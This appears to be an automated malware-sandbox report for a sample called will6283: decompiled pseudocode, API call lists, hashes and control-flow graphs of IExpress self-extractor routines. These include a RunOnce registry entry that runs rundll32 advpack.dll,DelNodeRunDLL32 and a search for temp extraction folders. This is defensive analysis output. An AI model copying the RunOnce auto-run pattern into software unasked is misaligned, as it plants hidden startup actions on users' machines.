                                                • Instruction ID: 7c2b4ced7f7c3d31cd895d8b656dc0919018941e6aa2db4cdee725e2d2228258
                                                • Opcode Fuzzy Hash: d248a4ae0992c5e24c448392cdf0133072deb310beaeffbb46ac3d6aadc0c5e2
                                                • Instruction Fuzzy Hash: F711AC7170030A9BE7307BF99848A673FDD9B847A4B044055FAC5F725CDA3AD8518750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01066F40() {
                                                
                                                				SetUnhandledExceptionFilter(E01066EF0); // executed
                                                				return 0;
                                                			}



                                                0x01066f45
                                                0x01066f4d

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 01066F45
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: e0521690b43803dfc93823899a467cbcc37021b94ae0548f9551679d1dd939a3
                                                • Instruction ID: 65b2c8184e4816319e5cd150c415a8662e4b9f336ed8c0556c37021baf10e081
                                                • Opcode Fuzzy Hash: e0521690b43803dfc93823899a467cbcc37021b94ae0548f9551679d1dd939a3
                                                • Instruction Fuzzy Hash: B6900270351100C797202B719D1941575955A4D6427815464E091DD458DB7690405651
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 93%
                                                			E0106202A(struct HINSTANCE__* __edx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				void* _v532;
                                                				int _v536;
                                                				int _v540;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t28;
                                                				long _t36;
                                                				long _t41;
                                                				struct HINSTANCE__* _t46;
                                                				intOrPtr _t49;
                                                				intOrPtr _t50;
                                                				CHAR* _t54;
                                                				void _t56;
                                                				signed int _t66;
                                                				intOrPtr* _t72;
                                                				void* _t73;
                                                				void* _t75;
                                                				void* _t80;
                                                				intOrPtr* _t81;
                                                				void* _t86;
                                                				void* _t87;
                                                				void* _t90;
                                                				_Unknown_base(*)()* _t91;
                                                				signed int _t93;
                                                				void* _t94;
                                                				void* _t95;
                                                
                                                				_t79 = __edx;
                                                				_t28 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t28 ^ _t93;
                                                				_t84 = 0x104;
                                                				memset( &_v268, 0, 0x104);
                                                				memset( &_v528, 0, 0x104);
                                                				_t95 = _t94 + 0x18;
                                                				_t66 = 0;
                                                				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                				if(_t36 != 0) {
                                                					L24:
                                                					return E01066CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                				}
                                                				_push(_t86);
                                                				_t87 = 0;
                                                				while(1) {
                                                					E0106171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                					_t95 = _t95 + 0x10;
                                                					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                					if(_t41 != 0) {
                                                						break;
                                                					}
                                                					_t87 = _t87 + 1;
                                                					if(_t87 < 0xc8) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				if(_t87 != 0xc8) {
                                                					GetSystemDirectoryA( &_v528, _t84);
                                                					_t79 = _t84;
                                                					E0106658A( &_v528, _t84, "advpack.dll");
                                                					_t46 = LoadLibraryA( &_v528); // executed
                                                					_t84 = _t46;
                                                					if(_t84 == 0) {
                                                						L10:
                                                						if(GetModuleFileNameA( *0x1069a3c,  &_v268, 0x104) == 0) {
                                                							L17:
                                                							_t36 = RegCloseKey(_v532);
                                                							L23:
                                                							_pop(_t86);
                                                							goto L24;
                                                						}
                                                						L11:
                                                						_t72 =  &_v268;
                                                						_t80 = _t72 + 1;
                                                						do {
                                                							_t49 =  *_t72;
                                                							_t72 = _t72 + 1;
                                                						} while (_t49 != 0);
                                                						_t73 = _t72 - _t80;
                                                						_t81 = 0x10691e4;
                                                						do {
                                                							_t50 =  *_t81;
                                                							_t81 = _t81 + 1;
                                                						} while (_t50 != 0);
                                                						_t84 = _t73 + 0x50 + _t81 - 0x10691e5;
                                                						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10691e5);
                                                						if(_t90 != 0) {
                                                							 *0x1068580 = _t66 ^ 0x00000001;
                                                							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                							if(_t66 == 0) {
                                                								_t54 = "%s /D:%s";
                                                							}
                                                							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                							E0106171E(_t90, _t84, _t54,  &_v268);
                                                							_t75 = _t90;
                                                							_t23 = _t75 + 1; // 0x1
                                                							_t79 = _t23;
                                                							do {
                                                								_t56 =  *_t75;
                                                								_t75 = _t75 + 1;
                                                							} while (_t56 != 0);
                                                							_t24 = _t75 - _t79 + 1; // 0x2
                                                							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                							RegCloseKey(_v532); // executed
                                                							_t36 = LocalFree(_t90);
                                                							goto L23;
                                                						}
                                                						_t79 = 0x4b5;
                                                						E010644B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                						goto L17;
                                                					}
                                                					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                					_t66 = 0 | _t91 != 0x00000000;
                                                					FreeLibrary(_t84); // executed
                                                					if(_t91 == 0) {
                                                						goto L10;
                                                					}
                                                					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                						E0106658A( &_v268, 0x104, 0x1061140);
                                                					}
                                                					goto L11;
                                                				}
                                                				_t36 = RegCloseKey(_v532);
                                                				 *0x1068530 = _t66;
                                                				goto L23;
                                                			}

































                                                0x0106202a
                                                0x01062035
                                                0x0106203c
                                                0x01062041
                                                0x01062050
                                                0x0106205f
                                                0x01062064
                                                0x0106206f
                                                0x0106208c
                                                0x01062094
                                                0x01062257
                                                0x01062266
                                                0x01062266
                                                0x0106209a
                                                0x0106209b
                                                0x0106209d
                                                0x010620aa
                                                0x010620af
                                                0x010620c9
                                                0x010620d1
                                                0x00000000
                                                0x00000000
                                                0x010620d3
                                                0x010620da
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x010620da
                                                0x010620e2
                                                0x01062103
                                                0x0106210e
                                                0x01062116
                                                0x01062122
                                                0x01062128
                                                0x0106212c
                                                0x01062179
                                                0x01062194
                                                0x010621de
                                                0x010621e4
                                                0x01062256
                                                0x01062256
                                                0x00000000
                                                0x01062256
                                                0x01062196
                                                0x01062196
                                                0x0106219c
                                                0x0106219f
                                                0x0106219f
                                                0x010621a1
                                                0x010621a2
                                                0x010621a6
                                                0x010621a8
                                                0x010621b0
                                                0x010621b0
                                                0x010621b2
                                                0x010621b3
                                                0x010621bc
                                                0x010621c7
                                                0x010621cb
                                                0x010621f1
                                                0x010621f6
                                                0x010621fd
                                                0x010621ff
                                                0x010621ff
                                                0x01062204
                                                0x01062213
                                                0x01062218
                                                0x0106221d
                                                0x0106221d
                                                0x01062220
                                                0x01062220
                                                0x01062222
                                                0x01062223
                                                0x01062229
                                                0x0106223d
                                                0x01062249
                                                0x01062250
                                                0x00000000
                                                0x01062250
                                                0x010621d2
                                                0x010621d9
                                                0x00000000
                                                0x010621d9
                                                0x0106213a
                                                0x01062141
                                                0x01062144
                                                0x0106214c
                                                0x00000000
                                                0x00000000
                                                0x01062163
                                                0x01062172
                                                0x01062172
                                                0x00000000
                                                0x01062163
                                                0x010620ea
                                                0x010620f0
                                                0x00000000

                                                APIs
                                                • memset.MSVCRT ref: 01062050
                                                • memset.MSVCRT ref: 0106205F
                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0106208C
                                                  • Part of subcall function 0106171E: _vsnprintf.MSVCRT ref: 01061750
                                                • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010620C9
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010620EA
                                                • GetSystemDirectoryA.KERNEL32 ref: 01062103
                                                • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01062122
                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 01062134
                                                • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01062144
                                                • GetSystemDirectoryA.KERNEL32 ref: 0106215B
                                                • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0106218C
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010621C1
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010621E4
                                                • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0106223D
                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01062249
                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01062250
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                • API String ID: 178549006-3073904943
                                                • Opcode ID: 03f20efef3a5489ad2df6aaaa5782b2aaec3840431257d84c8ff2b741cfc45fd
                                                • Instruction ID: 88b800b4443ebad23a9c6d197a17f9288cd820386d8fffbd0f4515ee5b54f038
                                                • Opcode Fuzzy Hash: 03f20efef3a5489ad2df6aaaa5782b2aaec3840431257d84c8ff2b741cfc45fd
                                                • Instruction Fuzzy Hash: D4511571A00215FBEB30AB64DC48FEB7B7CEB50700F0041A9FAC5EB155EA769E848B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 232 10655a0-10655d9 call 106468f LocalAlloc 235 10655fd-106560c call 106468f 232->235 236 10655db-10655f1 call 10644b9 call 1066285 232->236 241 1065632-1065643 lstrcmpA 235->241 242 106560e-1065630 call 10644b9 LocalFree 235->242 251 10655f6-10655f8 236->251 245 1065645 241->245 246 106564b-1065659 LocalFree 241->246 242->251 245->246 249 1065696-106569c 246->249 250 106565b-106565d 246->250 252 10656a2-10656a8 249->252 253 106589f-10658b5 call 1066517 249->253 254 106565f-1065667 250->254 255 1065669 250->255 256 10658b7-10658c7 call 1066ce0 251->256 252->253 257 10656ae-10656c1 GetTempPathA 252->257 253->256 254->255 258 106566b-106567a call 1065467 254->258 255->258 262 10656f3-1065711 call 1061781 257->262 263 10656c3-10656c9 call 1065467 257->263 270 1065680-1065691 call 10644b9 258->270 271 106589b-106589d 258->271 275 1065717-1065729 GetDriveTypeA 262->275 276 106586c-1065890 GetWindowsDirectoryA call 106597d 262->276 269 10656ce-10656d0 263->269 269->271 273 10656d6-10656df call 1062630 269->273 270->251 271->256 273->262 288 10656e1-10656ed call 1065467 273->288 280 1065730-1065740 GetFileAttributesA 275->280 281 106572b-106572e 275->281 276->262 289 1065896 276->289 282 1065742-1065745 280->282 283 106577e-106578f call 106597d 280->283 281->280 281->282 286 1065747-106574f 282->286 287 106576b 282->287 298 10657b2-10657bf call 1062630 283->298 299 1065791-106579e call 1062630 283->299 291 1065771-1065779 286->291 292 1065751-1065753 286->292 287->291 288->262 288->271 289->271 296 1065864-1065866 291->296 292->291 295 1065755-1065762 call 1066952 292->295 295->287 309 1065764-1065769 295->309 296->275 296->276 307 10657d3-10657f8 call 106658a GetFileAttributesA 298->307 308 10657c1-10657cd GetWindowsDirectoryA 298->308 299->287 306 10657a0-10657b0 call 106597d 299->306 306->287 306->298 314 106580a 307->314 315 10657fa-1065808 CreateDirectoryA 307->315 308->307 309->283 309->287 316 106580d-106580f 314->316 315->316 317 1065827-106585c SetFileAttributesA call 1061781 call 1065467 316->317 318 1065811-1065825 316->318 317->271 323 106585e 317->323 318->296 323->296
                                                C-Code - Quality: 92%
                                                			E010655A0(void* __eflags) {
                                                				signed int _v8;
                                                				char _v265;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t28;
                                                				int _t32;
                                                				int _t33;
                                                				int _t35;
                                                				signed int _t36;
                                                				signed int _t38;
                                                				int _t40;
                                                				int _t44;
                                                				long _t48;
                                                				int _t49;
                                                				int _t50;
                                                				signed int _t53;
                                                				int _t54;
                                                				int _t59;
                                                				char _t60;
                                                				int _t65;
                                                				char _t66;
                                                				int _t67;
                                                				int _t68;
                                                				int _t69;
                                                				int _t70;
                                                				int _t71;
                                                				struct _SECURITY_ATTRIBUTES* _t72;
                                                				int _t73;
                                                				CHAR* _t82;
                                                				CHAR* _t88;
                                                				void* _t103;
                                                				signed int _t110;
                                                
                                                				_t28 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t28 ^ _t110;
                                                				_t2 = E0106468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                				_t109 = LocalAlloc(0x40, _t2);
                                                				if(_t109 != 0) {
                                                					_t82 = "RUNPROGRAM";
                                                					_t32 = E0106468F(_t82, _t109, 1);
                                                					__eflags = _t32;
                                                					if(_t32 != 0) {
                                                						_t33 = lstrcmpA(_t109, "<None>");
                                                						__eflags = _t33;
                                                						if(_t33 == 0) {
                                                							 *0x1069a30 = 1;
                                                						}
                                                						LocalFree(_t109);
                                                						_t35 =  *0x1068b3e; // 0x0
                                                						__eflags = _t35;
                                                						if(_t35 == 0) {
                                                							__eflags =  *0x1068a24; // 0x0
                                                							if(__eflags != 0) {
                                                								L46:
                                                								_t101 = 0x7d2;
                                                								_t36 = E01066517(_t82, 0x7d2, 0, E01063210, 0, 0);
                                                								asm("sbb eax, eax");
                                                								_t38 =  ~( ~_t36);
                                                							} else {
                                                								__eflags =  *0x1069a30; // 0x0
                                                								if(__eflags != 0) {
                                                									goto L46;
                                                								} else {
                                                									_t109 = 0x10691e4;
                                                									_t40 = GetTempPathA(0x104, 0x10691e4);
                                                									__eflags = _t40;
                                                									if(_t40 == 0) {
                                                										L19:
                                                										_push(_t82);
                                                										E01061781( &_v268, 0x104, _t82, "A:\\");
                                                										__eflags = _v268 - 0x5a;
                                                										if(_v268 <= 0x5a) {
                                                											do {
                                                												_t109 = GetDriveTypeA( &_v268);
                                                												__eflags = _t109 - 6;
                                                												if(_t109 == 6) {
                                                													L22:
                                                													_t48 = GetFileAttributesA( &_v268);
                                                													__eflags = _t48 - 0xffffffff;
                                                													if(_t48 != 0xffffffff) {
                                                														goto L30;
                                                													} else {
                                                														goto L23;
                                                													}
                                                												} else {
                                                													__eflags = _t109 - 3;
                                                													if(_t109 != 3) {
                                                														L23:
                                                														__eflags = _t109 - 2;
                                                														if(_t109 != 2) {
                                                															L28:
                                                															_t66 = _v268;
                                                															goto L29;
                                                														} else {
                                                															_t66 = _v268;
                                                															__eflags = _t66 - 0x41;
                                                															if(_t66 == 0x41) {
                                                																L29:
                                                																_t60 = _t66 + 1;
                                                																_v268 = _t60;
                                                																goto L42;
                                                															} else {
                                                																__eflags = _t66 - 0x42;
                                                																if(_t66 == 0x42) {
                                                																	goto L29;
                                                																} else {
                                                																	_t68 = E01066952( &_v268);
                                                																	__eflags = _t68;
                                                																	if(_t68 == 0) {
                                                																		goto L28;
                                                																	} else {
                                                																		__eflags = _t68 - 0x19000;
                                                																		if(_t68 >= 0x19000) {
                                                																			L30:
                                                																			_push(0);
                                                																			_t103 = 3;
                                                																			_t49 = E0106597D( &_v268, _t103, 1);
                                                																			__eflags = _t49;
                                                																			if(_t49 != 0) {
                                                																				L33:
                                                																				_t50 = E01062630(0,  &_v268, 1);
                                                																				__eflags = _t50;
                                                																				if(_t50 != 0) {
                                                																					GetWindowsDirectoryA( &_v268, 0x104);
                                                																				}
                                                																				_t88 =  &_v268;
                                                																				E0106658A(_t88, 0x104, "msdownld.tmp");
                                                																				_t53 = GetFileAttributesA( &_v268);
                                                																				__eflags = _t53 - 0xffffffff;
                                                																				if(_t53 != 0xffffffff) {
                                                																					_t54 = _t53 & 0x00000010;
                                                																					__eflags = _t54;
                                                																				} else {
                                                																					_t54 = CreateDirectoryA( &_v268, 0);
                                                																				}
                                                																				__eflags = _t54;
                                                																				if(_t54 != 0) {
                                                																					SetFileAttributesA( &_v268, 2);
                                                																					_push(_t88);
                                                																					_t109 = 0x10691e4;
                                                																					E01061781(0x10691e4, 0x104, _t88,  &_v268);
                                                																					_t101 = 1;
                                                																					_t59 = E01065467(0x10691e4, 1, 0);
                                                																					__eflags = _t59;
                                                																					if(_t59 != 0) {
                                                																						goto L45;
                                                																					} else {
                                                																						_t60 = _v268;
                                                																						goto L42;
                                                																					}
                                                																				} else {
                                                																					_t60 = _v268 + 1;
                                                																					_v265 = 0;
                                                																					_v268 = _t60;
                                                																					goto L42;
                                                																				}
                                                																			} else {
                                                																				_t65 = E01062630(0,  &_v268, 1);
                                                																				__eflags = _t65;
                                                																				if(_t65 != 0) {
                                                																					goto L28;
                                                																				} else {
                                                																					_t67 = E0106597D( &_v268, 1, 1, 0);
                                                																					__eflags = _t67;
                                                																					if(_t67 == 0) {
                                                																						goto L28;
                                                																					} else {
                                                																						goto L33;
                                                																					}
                                                																				}
                                                																			}
                                                																		} else {
                                                																			goto L28;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													} else {
                                                														goto L22;
                                                													}
                                                												}
                                                												goto L47;
                                                												L42:
                                                												__eflags = _t60 - 0x5a;
                                                											} while (_t60 <= 0x5a);
                                                										}
                                                										goto L43;
                                                									} else {
                                                										_t101 = 1;
                                                										_t69 = E01065467(0x10691e4, 1, 3); // executed
                                                										__eflags = _t69;
                                                										if(_t69 != 0) {
                                                											goto L45;
                                                										} else {
                                                											_t82 = 0x10691e4;
                                                											_t70 = E01062630(0, 0x10691e4, 1);
                                                											__eflags = _t70;
                                                											if(_t70 != 0) {
                                                												goto L19;
                                                											} else {
                                                												_t101 = 1;
                                                												_t82 = 0x10691e4;
                                                												_t71 = E01065467(0x10691e4, 1, 1);
                                                												__eflags = _t71;
                                                												if(_t71 != 0) {
                                                													goto L45;
                                                												} else {
                                                													do {
                                                														goto L19;
                                                														L43:
                                                														GetWindowsDirectoryA( &_v268, 0x104);
                                                														_push(4);
                                                														_t101 = 3;
                                                														_t82 =  &_v268;
                                                														_t44 = E0106597D(_t82, _t101, 1);
                                                														__eflags = _t44;
                                                													} while (_t44 != 0);
                                                													goto L2;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						} else {
                                                							__eflags = _t35 - 0x5c;
                                                							if(_t35 != 0x5c) {
                                                								L10:
                                                								_t72 = 1;
                                                							} else {
                                                								__eflags =  *0x1068b3f - _t35; // 0x0
                                                								_t72 = 0;
                                                								if(__eflags != 0) {
                                                									goto L10;
                                                								}
                                                							}
                                                							_t101 = 0;
                                                							_t73 = E01065467(0x1068b3e, 0, _t72);
                                                							__eflags = _t73;
                                                							if(_t73 != 0) {
                                                								L45:
                                                								_t38 = 1;
                                                							} else {
                                                								_t101 = 0x4be;
                                                								E010644B9(0, 0x4be, 0, 0, 0x10, 0);
                                                								goto L2;
                                                							}
                                                						}
                                                					} else {
                                                						_t101 = 0x4b1;
                                                						E010644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                						LocalFree(_t109);
                                                						 *0x1069124 = 0x80070714;
                                                						goto L2;
                                                					}
                                                				} else {
                                                					_t101 = 0x4b5;
                                                					E010644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                					 *0x1069124 = E01066285();
                                                					L2:
                                                					_t38 = 0;
                                                				}
                                                				L47:
                                                				return E01066CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                			}





































                                                0x010655ab
                                                0x010655b2
                                                0x010655c9
                                                0x010655d5
                                                0x010655d9
                                                0x01065600
                                                0x01065605
                                                0x0106560a
                                                0x0106560c
                                                0x01065638
                                                0x01065641
                                                0x01065643
                                                0x01065645
                                                0x01065645
                                                0x0106564c
                                                0x01065652
                                                0x01065657
                                                0x01065659
                                                0x01065696
                                                0x0106569c
                                                0x0106589f
                                                0x010658a7
                                                0x010658ac
                                                0x010658b3
                                                0x010658b5
                                                0x010656a2
                                                0x010656a2
                                                0x010656a8
                                                0x00000000
                                                0x010656ae
                                                0x010656ae
                                                0x010656b9
                                                0x010656bf
                                                0x010656c1
                                                0x010656f3
                                                0x010656f3
                                                0x01065705
                                                0x0106570a
                                                0x01065711
                                                0x01065717
                                                0x01065724
                                                0x01065726
                                                0x01065729
                                                0x01065730
                                                0x01065737
                                                0x0106573d
                                                0x01065740
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0106572b
                                                0x0106572b
                                                0x0106572e
                                                0x01065742
                                                0x01065742
                                                0x01065745
                                                0x0106576b
                                                0x0106576b
                                                0x00000000
                                                0x01065747
                                                0x01065747
                                                0x0106574d
                                                0x0106574f
                                                0x01065771
                                                0x01065771
                                                0x01065773
                                                0x00000000
                                                0x01065751
                                                0x01065751
                                                0x01065753
                                                0x00000000
                                                0x01065755
                                                0x0106575b
                                                0x01065760
                                                0x01065762
                                                0x00000000
                                                0x01065764
                                                0x01065764
                                                0x01065769
                                                0x0106577e
                                                0x0106577e
                                                0x01065781
                                                0x01065788
                                                0x0106578d
                                                0x0106578f
                                                0x010657b2
                                                0x010657b8
                                                0x010657bd
                                                0x010657bf
                                                0x010657cd
                                                0x010657cd
                                                0x010657dd
                                                0x010657e3
                                                0x010657ef
                                                0x010657f5
                                                0x010657f8
                                                0x0106580a
                                                0x0106580a
                                                0x010657fa
                                                0x01065802
                                                0x01065802
                                                0x0106580d
                                                0x0106580f
                                                0x01065830
                                                0x01065836
                                                0x0106583d
                                                0x0106584b
                                                0x01065851
                                                0x01065855
                                                0x0106585a
                                                0x0106585c
                                                0x00000000
                                                0x0106585e
                                                0x0106585e
                                                0x00000000
                                                0x0106585e
                                                0x01065811
                                                0x01065817
                                                0x01065819
                                                0x0106581f
                                                0x00000000
                                                0x0106581f
                                                0x01065791
                                                0x01065797
                                                0x0106579c
                                                0x0106579e
                                                0x00000000
                                                0x010657a0
                                                0x010657a9
                                                0x010657ae
                                                0x010657b0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x010657b0
                                                0x0106579e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01065769
                                                0x01065762
                                                0x01065753
                                                0x0106574f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0106572e
                                                0x00000000
                                                0x01065864
                                                0x01065864
                                                0x01065864
                                                0x01065717
                                                0x00000000
                                                0x010656c3
                                                0x010656c5
                                                0x010656c9
                                                0x010656ce
                                                0x010656d0
                                                0x00000000
                                                0x010656d6
                                                0x010656d6
                                                0x010656d8
                                                0x010656dd
                                                0x010656df
                                                0x00000000
                                                0x010656e1
                                                0x010656e2
                                                0x010656e4
                                                0x010656e6
                                                0x010656eb
                                                0x010656ed
                                                0x00000000
                                                0x010656f3
                                                0x010656f3
                                                0x00000000
                                                0x0106586c
                                                0x01065878
                                                0x0106587e
                                                0x01065882
                                                0x01065883
                                                0x01065889
                                                0x0106588e
                                                0x0106588e
                                                0x00000000
                                                0x01065896
                                                0x010656ed
                                                0x010656df
                                                0x010656d0
                                                0x010656c1
                                                0x010656a8
                                                0x0106565b
                                                0x0106565b
                                                0x0106565d
                                                0x01065669
                                                0x01065669
                                                0x0106565f
                                                0x0106565f
                                                0x01065665
                                                0x01065667
                                                0x00000000
                                                0x00000000
                                                0x01065667
                                                0x0106566c
                                                0x01065673
                                                0x01065678
                                                0x0106567a
                                                0x0106589b
                                                0x0106589b
                                                0x01065680
                                                0x01065685
                                                0x0106568c
                                                0x00000000
                                                0x0106568c
                                                0x0106567a
                                                0x0106560e
                                                0x01065613
                                                0x0106561a
                                                0x01065620
                                                0x01065626
                                                0x00000000
                                                0x01065626
                                                0x010655db
                                                0x010655e0
                                                0x010655e7
                                                0x010655f1
                                                0x010655f6
                                                0x010655f6
                                                0x010655f6
                                                0x010658b7
                                                0x010658c7

                                                APIs
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
                                                  • Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
                                                  • Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
                                                  • Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
                                                  • Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
                                                  • Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF
                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010655CF
                                                • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 01065638
                                                • LocalFree.KERNEL32(00000000), ref: 0106564C
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 01065620
                                                  • Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
                                                  • Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554
                                                  • Part of subcall function 01066285: GetLastError.KERNEL32(01065BBC), ref: 01066285
                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010656B9
                                                • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0106571E
                                                • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 01065737
                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010657CD
                                                • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010657EF
                                                • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 01065802
                                                  • Part of subcall function 01062630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 01062654
                                                • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 01065830
                                                  • Part of subcall function 01066517: FindResourceA.KERNEL32(01060000,000007D6,00000005), ref: 0106652A
                                                  • Part of subcall function 01066517: LoadResource.KERNEL32(01060000,00000000,?,?,01062EE8,00000000,010619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01066538
                                                  • Part of subcall function 01066517: DialogBoxIndirectParamA.USER32(01060000,00000000,00000547,010619E0,00000000), ref: 01066557
                                                  • Part of subcall function 01066517: FreeResource.KERNEL32(00000000,?,?,01062EE8,00000000,010619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01066560
                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 01065878
                                                  • Part of subcall function 0106597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010659A8
                                                  • Part of subcall function 0106597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010659AF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
